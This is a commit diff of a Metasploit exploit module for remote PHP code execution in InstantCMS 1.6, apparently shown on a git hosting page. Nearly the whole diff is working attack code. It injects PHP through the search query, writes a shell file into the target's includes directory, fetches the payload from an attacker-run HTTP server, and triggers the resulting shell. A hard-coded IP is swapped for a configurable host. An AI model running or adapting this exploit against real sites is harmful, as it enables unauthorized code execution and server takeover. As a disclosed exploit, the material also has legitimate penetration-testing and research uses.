Update instantcms_exec.rb
Ricardo Almeida
parent
dafa333e57
commit
dd876008f9
|
|
@ -3,32 +3,31 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'InstantCMS <= 1.6 remote PHP code execution',
|
||||
'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions <= 1.6 },
|
||||
'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com> or <ricardojba[at]aeiou.pt>' # Metasploit module
|
||||
'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
|
||||
'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions 1.6 },
|
||||
'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Jun 26 2013',
|
||||
'DefaultTarget' => 0))
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "URI path", "/"]),
|
||||
OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
@ -39,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'view' => 'search',
|
||||
'query' => '${echo phpinfo()}'
|
||||
}
|
||||
}, 25)
|
||||
})
|
||||
|
||||
if res
|
||||
if res.body.match(/Build Date/)
|
||||
|
|
@ -55,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("on_request_uri called: #{request.inspect}")
|
||||
#print_status("on_request_uri called: #{request.inspect}")
|
||||
send_response(cli, payload.encoded)
|
||||
#send_response(cli, payload.encoded , { 'Content-Type' => 'text/plain' })
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
@ -68,23 +66,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fname = Rex::Text.rand_text_alpha(3) + ".php"
|
||||
resource_uri = '/' + Rex::Text.rand_text_alpha(3)
|
||||
|
||||
sploit_uri = "http://89.154.97.12:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
#sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
|
||||
sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"
|
||||
|
||||
sploit_fname = fname.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
shell_uri = sploit_uri.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req| on_request_uri(cli, req)
|
||||
exec = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
|
||||
start_service({
|
||||
'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req| on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
'Path' => resource_uri }})
|
||||
|
||||
print_status("Creating the shell on http://#{rhost}:#{rport}/includes/#{fname}")
|
||||
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'vars_get' =>
|
||||
|
|
@ -94,10 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
|
||||
File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
||||
|
||||
if res
|
||||
if res
|
||||
if res.code == 200
|
||||
print_status("Shell created successfully.")
|
||||
else
|
||||
|
|
@ -109,16 +102,13 @@ File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
|||
stop_service
|
||||
end
|
||||
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI'], "includes", fname),
|
||||
})
|
||||
|
||||
|
||||
if res
|
||||
if res
|
||||
if res.code == 200
|
||||
print_status("Requesting the reverse shell.")
|
||||
print_status("Requesting the shell.")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to request the reverse shell.")
|
||||
stop_service
|
||||
|
|
@ -128,12 +118,9 @@ File.open('/root/Desktop/metasploit1.html', 'w') { |fd| fd.write(res.body) }
|
|||
stop_service
|
||||
end
|
||||
|
||||
|
||||
File.open('/root/Desktop/metasploit12.html', 'w') { |fd| fd.write(res.body) }
|
||||
|
||||
stop_service
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue